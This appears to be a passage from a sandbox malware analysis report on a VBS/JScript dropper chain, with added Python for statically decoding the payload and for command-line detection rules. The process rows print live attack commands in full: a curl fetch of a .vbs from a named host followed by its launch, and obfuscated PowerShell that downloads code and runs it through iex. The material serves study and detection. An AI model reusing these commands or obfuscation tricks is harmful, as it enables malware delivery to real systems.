            Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00007FFD3451258D push eax; ret 15_2_00007FFD34512606
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00007FFD3451802D push ebx; ret 15_2_00007FFD3451816A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00007FFD345E172C push esp; retf FD8Fh 15_2_00007FFD345E1A92
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00007FFD345E0DB1 pushad ; iretd 15_2_00007FFD345E0DD1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD345C1865 push esp; retf FD8Fh 17_2_00007FFD345C1A92
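The PowerShell command lines in the rows above hide their target behind three cheap tricks: the download URL exists only as an integer array that is turned into characters at runtime by subtracting a per-sample constant (`[char]($n-5193)` in one run, `[char]($n-2491)` in the other), the verb is assembled as `[char](9992-9887)+'e'+'x'`, and `curl` is reached through a `new-alias` whose target is spliced together from a variable. The decoder below is an added example written for this page, not code from the Joe Sandbox report or from the sample; it performs the same arithmetic statically so the staged target can be read without running anything. Both command lines are copied verbatim from the process rows above. The regular expressions assume the exact layout seen here (one integer tuple, one `[char]($var-KEY)` loop, one `.$(...)` call operator followed by a single variable reference), which is a stated assumption rather than a general PowerShell parser. Both arrays decode to the same scheme-less URL on gsosnub8zg3[.]top, with the query string `s=mints21`.

```python
"""Static decoder for the PowerShell stage captured in this report.

Added example; not part of the Joe Sandbox report and not the sample's own
code. It re-implements, outside PowerShell, the transform the command line
performs at runtime:  foreach($n in $array){ $s += [char]($n - KEY) }
so the staged target can be recovered without executing anything.
CMDLINE_A / CMDLINE_B are copied verbatim from the report's process rows.
"""
import re

CMDLINE_A = (
    "powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;"
    "$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,"
    "5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);"
    "$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;"
    "foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;"
    "$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; "
    "$wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;"
    ".$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)"
)
CMDLINE_B = (
    "powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;"
    "$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,"
    "2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);"
    "$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;"
    "foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;"
    "$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; "
    "$ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;"
    ".$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)"
)

INT_TUPLE = re.compile(r"\(\s*(\d+(?:\s*,\s*\d+){3,})\s*\)")   # the integer array (4+ entries)
LOOP_KEY = re.compile(r"\[char\]\(\$\w+\s*-\s*(\d+)\)")          # [char]($n - KEY) in the loop
CHAR_MATH = re.compile(r"\[char\]\((\d+)\s*-\s*(\d+)\)")        # [char](9992-9887)
STR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")             # $var='literal'
NEW_ALIAS = re.compile(r"new-alias\s+(\S+)\s+([^\s;]+)", re.I)  # new-alias NAME TARGET
SUBEXPR = re.compile(r"\$\(\$(\w+)\)")                          # $($var) spliced into a bare word
DOT_INVOKE = re.compile(r"\.\$\(((?:[^()]|\([^()]*\))*)\)")     # .$( ... ) call operator


def decode_array(values, key):
    """Apply the per-element subtraction the loop performs and join the chars."""
    return "".join(chr(v - key) for v in values)


def eval_concat(expr):
    """Evaluate a '+'-joined mix of [char](a-b) terms and single-quoted literals."""
    out = []
    for term in (t.strip() for t in expr.split("+")):
        m = CHAR_MATH.fullmatch(term)
        if m:
            out.append(chr(int(m.group(1)) - int(m.group(2))))
        elif len(term) >= 2 and term[0] == term[-1] == "'":
            out.append(term[1:-1])
        else:
            raise ValueError(f"unsupported term: {term!r}")
    return "".join(out)


def deobfuscate(cmd):
    """Recover alias targets, the decoded string and the final invocation."""
    assigns = dict(STR_ASSIGN.findall(cmd))
    aliases = {name: SUBEXPR.sub(lambda m: assigns.get(m.group(1), m.group(0)), target)
               for name, target in NEW_ALIAS.findall(cmd)}
    values = [int(v.strip()) for v in INT_TUPLE.search(cmd).group(1).split(",")]
    key = int(LOOP_KEY.search(cmd).group(1))
    decoded = decode_array(values, key)          # decodes to gsosnub8zg3.top/1.php?s=mints21
    call = DOT_INVOKE.search(cmd)
    verb = eval_concat(call.group(1))            # [char](9992-9887)+'e'+'x' -> iex
    tail = cmd[call.end():].strip()
    # Assumption (true for both captured lines): the only variable referenced
    # after the call operator is the one that holds the decoded string.
    tail = re.sub(r"\$\w+", lambda _: decoded, tail)
    for name, target in aliases.items():
        tail = re.sub(rf"\b{re.escape(name)}\b", lambda _, t=target: t, tail)
    return {"aliases": aliases, "key": key, "decoded": decoded,
            "verb": verb, "invocation": f"{verb} {tail}"}


if __name__ == "__main__":
    for label, cmd in (("A", CMDLINE_A), ("B", CMDLINE_B)):
        r = deobfuscate(cmd)
        print(f"{label}: key={r['key']} aliases={r['aliases']} -> {r['invocation']}")
```

In Windows PowerShell 5.1, `curl` is a built-in alias for Invoke-WebRequest, `-useb` is an unambiguous prefix of `-UseBasicParsing`, and `iex` is Invoke-Expression, so the reconstructed line is a plain download-and-execute: the response body is handed to Invoke-Expression without being written to disk, which is why the only dropped file in this chain is the first-stage .vbs in C:\Users\Public and the useful evidence is the AMSI capture and the process command line. The per-sample constant (5193 vs 2491) and the random variable names change between runs while the array length and the `[char](9992-9887)` verb do not, so the structural pattern is the stable thing to key on.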

            Persistence and Installation Behavior

            Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
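The rows above record IWbemServices::ExecMethod calls to Win32_Process::Create from wscript.exe and conhost.exe. A process started that way is created by the WMI provider host, so endpoint telemetry records WmiPrvSE.exe as its parent rather than the script host that asked for it; a detection that keys only on a wscript.exe -> powershell.exe parent chain misses this launch. The Python below is an added example written for this page, not part of the Joe Sandbox report: it applies four command-line-centric checks to constructed Sysmon-style process events modelled on this report's process tree, so the chain is caught from the command lines themselves whatever the parent looks like. The event list is constructed, not real telemetry; the second-stage URL is truncated in the report, so the constructed event uses the placeholder https://example.invalid/stage2, and the WmiPrvSE.exe parent on the conhost event is an assumption about how the WMI launch would appear in EDR data.

```python
"""Command-line-centric triage for the execution chain in this report.

Added example; not part of the Joe Sandbox report. Field names follow Sysmon
Event ID 1 (Image, ParentImage, CommandLine). EVENTS is constructed to mirror
the report's process tree and is not real telemetry.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# User-writable locations the report shows being used for staging.
STAGING_DIR = re.compile(r"\\Users\\Public\\|\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
INT_BLOB = re.compile(r"\(\s*\d+(?:\s*,\s*\d+){7,}\s*\)")                     # (n,n,n,...) of 8+ integers
CHAR_ARITH = re.compile(r"\[char\]\(\s*(?:\$\w+|\d+)\s*-\s*\d+\s*\)", re.I)  # [char](x-KEY)

# Shortened copy of the report's PowerShell stage (same constructs, fewer array entries).
STAGE_PS = ("powershell $a='ur' ;new-alias printout c$($a)l;"
            "$b=(5296,5308,5304,5308,5303,5310,5291,5249);"
            "foreach($n in $b){$s=$s+[char]($n-5193)};"
            ".$([char](9992-9887)+'e'+'x')(printout -useb $s)")

EVENTS = [  # constructed events
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     # the URL host is a placeholder; the report truncates the real one
     "CommandLine": r"cmd /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://example.invalid/stage2"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"cmd /V/D/c start C:\Users\Public\67618a47ee8cd.vbs"},
    # Launched through Win32_Process.Create: recorded parent is WmiPrvSE.exe, not the script host (assumption)
    {"Image": r"C:\Windows\System32\conhost.exe", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "conhost --headless " + STAGE_PS},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\conhost.exe", "CommandLine": STAGE_PS},
    # Benign control: interactive curl download, TLS verification intact, ordinary parent and path
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd /c curl -o C:\Users\user\Downloads\report.pdf https://example.invalid/report.pdf"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rules_for(ev):
    """Return the names of the checks a single process-creation event trips."""
    image, parent, cmd = _basename(ev["Image"]), _basename(ev["ParentImage"]), ev["CommandLine"]
    hits = []
    # R1: script host -> cmd/curl fetching into a staging dir with certificate checks off (-k)
    if (parent in SCRIPT_HOSTS and image in {"cmd.exe", "curl.exe"}
            and re.search(r"\bcurl\b", cmd, re.I)
            and re.search(r"(^|\s)(-k|--insecure)(\s|$)", cmd)
            and re.search(r"(^|\s)(-o|--output)\s+\S+", cmd)
            and STAGING_DIR.search(cmd)):
        hits.append("script_host_curl_drop")
    # R2: cmd 'start' of a script file that sits in a staging dir
    if (image == "cmd.exe" and STAGING_DIR.search(cmd)
            and re.search(r"\bstart\b\s+\S+\.(vbs|vbe|js|jse|wsf)\b", cmd, re.I)):
        hits.append("staged_script_launch")
    # R3: conhost --headless used as a launcher for powershell, whatever the parent is
    if image == "conhost.exe" and "--headless" in cmd.lower() and re.search(r"\bpowershell\b", cmd, re.I):
        hits.append("conhost_headless_powershell")
    # R4: integer array plus [char] subtraction in a PowerShell command line
    if image in {"powershell.exe", "pwsh.exe", "conhost.exe"} and INT_BLOB.search(cmd) and CHAR_ARITH.search(cmd):
        hits.append("powershell_char_arith_decode")
    return hits


def triage(events):
    """(event index, rule name) pairs for every hit, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in rules_for(ev)]


if __name__ == "__main__":
    for i, rule in triage(EVENTS):
        print(f"event {i}: {rule}")
```

R1 and R2 match the first-stage dropper exactly as the AMSI capture shows it (curl with `-k`, output into C:\Users\Public, then `start` of the dropped .vbs); R3 and R4 match the second stage on its own command line, so they still fire when the parent is WmiPrvSE.exe or when the script host has already exited. The benign control event trips nothing because it lacks `-k`, a script-host parent and a staging path.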
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6109
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3663
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7135
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2558
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760 | Thread sleep count: 6109 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760 | Thread sleep count: 3663 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep time: -15679732462653109s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484 | Thread sleep count: 7135 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484 | Thread sleep count: 2558 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540 | Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1776 | Thread sleep time: -922337203685477s >= -30000s
            Source: wscript.exe, 00000007.00000002.2285013444.0000015CCDA2D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}7"
            Source: wscript.exe, 00000007.00000002.2285013444.0000015CCDA2D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ "4636Z
            Source: wscript.exe, 00000007.00000002.2284685294.0000015CCBB0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281642188.0000015CCBB0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2284868153.0000015CCD9B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267622863.000001E9B13A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266409480.000001E9AF351000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262502439.000001E9AF34B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000007.00000002.2285013444.0000015CCDA2D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC242000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: wscript.exe, 00000007.00000002.2284685294.0000015CCBB0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281642188.0000015CCBB0A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWB
            Source: curl.exe, 00000004.00000003.2171270324.000001979CB45000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.2171485278.000001979CB48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\wscript.exe | Network Connect: 45.11.180.77 443
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js
            Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
